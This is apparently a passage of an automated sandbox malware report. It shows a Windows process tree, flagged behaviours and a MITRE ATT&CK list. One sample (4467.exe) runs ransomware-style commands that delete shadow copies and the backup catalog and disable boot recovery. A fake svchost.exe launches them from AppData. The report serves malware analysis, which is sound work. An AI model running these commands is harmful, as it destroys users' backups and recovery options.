C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1560 -ip 1560
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3680 -ip 3680
1⤵
PID:1296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3832 -ip 3832
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6068

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:3340
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:1316
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1316 -s 460
    3⤵
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:1924
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1316 -s 460
    3⤵
    - Program crash
    PID:4584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 4192 -ip 4192
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 1316 -ip 1316
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 2508 -ip 2508
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4684

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
1⤵
PID:3680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5708 -ip 5708
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 444 -ip 444
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 6772 -ip 6772
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3232

C:\Users\Admin\AppData\Local\Temp\6EC3.exe
C:\Users\Admin\AppData\Local\Temp\6EC3.exe
1⤵
- Suspicious use of SetWindowsHookEx
PID:6828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 6748 -ip 6748
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3424

C:\Users\Admin\AppData\Local\Temp\919E.exe
C:\Users\Admin\AppData\Local\Temp\919E.exe
1⤵
PID:1308
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1308 -s 236
  2⤵
  - Program crash
  PID:2980

C:\Users\Admin\AppData\Local\Temp\CBF9.exe
C:\Users\Admin\AppData\Local\Temp\CBF9.exe
1⤵
PID:4796
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4796 -s 236
  2⤵
  - Program crash
  PID:720

C:\Users\Admin\AppData\Local\Temp\F7CC.exe
C:\Users\Admin\AppData\Local\Temp\F7CC.exe
1⤵
PID:4432
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 240
  2⤵
  - Program crash
  PID:8780

C:\Users\Admin\AppData\Local\Temp\4467.exe
C:\Users\Admin\AppData\Local\Temp\4467.exe
1⤵
PID:7540
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -start
  2⤵
  PID:4548
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -agent 0
    3⤵
    PID:8824
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
    3⤵
    - Blocklisted process makes network request
    PID:684
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      PID:2360
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
    3⤵
    PID:3984
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
    3⤵
    - Blocklisted process makes network request
    PID:5432
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    PID:3368
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
    3⤵
    PID:7796
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
    3⤵
    - Blocklisted process makes network request
    - Executes dropped EXE
    PID:4856
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      PID:1940
- - C:\Windows\SysWOW64\notepad.exe
    notepad.exe
    3⤵
    PID:6596
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
  2⤵
  PID:8364
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    PID:7364
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
  2⤵
  PID:8460
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  PID:5264
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
  2⤵
  PID:7220
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
  2⤵
  PID:8424
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
  2⤵
  PID:7948
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    PID:1032
- C:\Users\Admin\AppData\Local\Temp\4467.exe
  "C:\Users\Admin\AppData\Local\Temp\4467.exe" -agent 0
  2⤵
  PID:5488

C:\Users\Admin\AppData\Local\Temp\6B78.exe
C:\Users\Admin\AppData\Local\Temp\6B78.exe
1⤵
PID:4744
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe"
  2⤵
  PID:8472
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe"
  2⤵
  PID:8548

C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility
1⤵
PID:3392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 1308 -ip 1308
1⤵
PID:7708

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6964
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 6964 -s 876
  2⤵
  - Program crash
  PID:7792

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:7068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5332 -ip 5332
1⤵
PID:1536

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8172

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:7324

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8068

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 6964 -ip 6964
1⤵
PID:8088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4796 -ip 4796
1⤵
PID:7792

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2092

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:6516

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 4432 -ip 4432
1⤵
PID:8500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 8316 -ip 8316
1⤵
PID:9048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5512 -ip 5512
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 6056 -ip 6056
1⤵
PID:8912

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 660 -p 5124 -ip 5124
1⤵
PID:3184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3660 -ip 3660
1⤵
PID:7768

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 408 -p 3088 -ip 3088
1⤵
PID:5036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 444 -ip 444
1⤵
PID:6104

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 6276 -ip 6276
1⤵
PID:7812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1396 -ip 1396
1⤵
PID:7288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2148 -ip 2148
1⤵
PID:9196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5152 -ip 5152
1⤵
PID:7976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 7692 -ip 7692
1⤵
PID:3044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 10472 -ip 10472
1⤵
PID:10524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 11044 -ip 11044
1⤵
PID:10288

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 652 -p 932 -ip 932
1⤵
PID:4960

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 932 -s 2104
1⤵
- Program crash
PID:5260

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:11432
- C:\Windows\explorer.exe
  explorer.exe /LOADSAVEDWINDOWS
  2⤵
  PID:11140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 11964 -ip 11964
1⤵
PID:3808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 6024 -ip 6024
1⤵
PID:13456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 12648 -ip 12648
1⤵
PID:13436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 12068 -ip 12068
1⤵
PID:9380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 17932 -ip 17932
1⤵
PID:13712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 12912 -ip 12912
1⤵
PID:18452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 18824 -ip 18824
1⤵
PID:19864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 19856 -ip 19856
1⤵
PID:12800

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
1⤵
PID:16596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 7564 -ip 7564
1⤵
PID:19732

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:19144

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:19072

C:\Windows\system32\werfault.exe
werfault.exe /hc /shared Global\2f60f302ab49453c844c7c7dd520b4b9 /t 11328 /p 16596
1⤵
PID:16428

C:\Windows\system32\werfault.exe
werfault.exe /hc /shared Global\c2e5c6f0a06244078e1be5f3b25c5b24 /t 13588 /p 19144
1⤵
PID:19544

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
1⤵
PID:18252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:18092

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

Scheduled Task

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

File Deletion

T1107

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery